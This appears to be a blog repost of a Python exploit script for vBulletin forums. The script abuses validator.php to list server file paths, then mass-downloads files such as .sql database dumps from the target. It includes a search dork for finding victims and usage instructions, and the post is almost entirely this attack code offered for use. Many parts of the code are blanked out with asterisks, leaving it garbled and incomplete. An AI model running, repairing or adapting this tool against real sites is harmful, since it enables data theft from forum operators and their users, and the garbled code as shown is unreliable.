Sunday, February 5, 2012

TinKode-vBulletin Full Disclosure [Python]


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
#! /usr/bin/env python3.1 
# 
################################################################ 
#                ____        _ _      _   _ (validator.php)    # 
#               |  _ \      | | |    | | (_)                   # 
#         __   _| |_) |_   _| | | ___| |_ _ _ __               # 
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              # 
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             # 
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             # 
#                                   @expl0it...                # 
################################################################ 
#       [ vBulletin Files / Directories Full Disclosure ]      # 
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   # 
#           [ Greetz: insecurity.ro, darkc0de.com ]            # 
################################################################ 
#                                                              # 
#                  Special thanks for: cmiN                    # 
#                  www.TinKode.BayWords.com                    # 
################################################################ 
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]********...") 
    hurl = url + "/validator.php" 
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    while threading.********) > 1: 
        pass 
 
 
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        except: 
            pass 
 
 
********"__main__": 
    main()


You need python 3.1 to work!

0 comentarii:

Post a Comment